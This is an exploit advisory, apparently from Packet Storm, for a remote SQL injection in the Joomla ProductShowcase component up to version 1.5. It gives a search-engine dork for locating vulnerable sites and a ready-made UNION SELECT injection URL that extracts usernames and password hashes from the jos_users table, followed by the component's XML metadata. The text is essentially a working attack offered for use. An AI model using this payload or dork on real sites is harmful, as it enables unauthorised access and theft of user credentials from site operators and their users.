The Joomla ProductShowcase component versions 1.5 and below suffer from a remote SQL injection vulnerability.
d276383cd0c09cecec85db7f090c419abd81bc97421735649f5eccb2ce8b4e92##########################################
#
# Joomla Component com_productshowcase SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"com_productshowcase"
#
###########################################
EXPLOIT :
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
###########################################
##################S@BUN##################
###########################################
#####hackturkiye.hackturkiye@gmail.com#######
###########################################
<name>ProductShowcase</name>
<creationDate>10 July 2006</creationDate>
<author>Numa Technologies Corporation</author>
<copyright>Copyright ©2006 Numa Technolgies Corporation. All Rights Reserved Worldwide.</copyright>
<authorEmail>scott@numacorp.com</authorEmail>
<authorUrl>www.numacorp.com</authorUrl>
<version>1.5</version>
<description>A Simple Product Gallery.</description>
<version>1.4</version> << as well.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed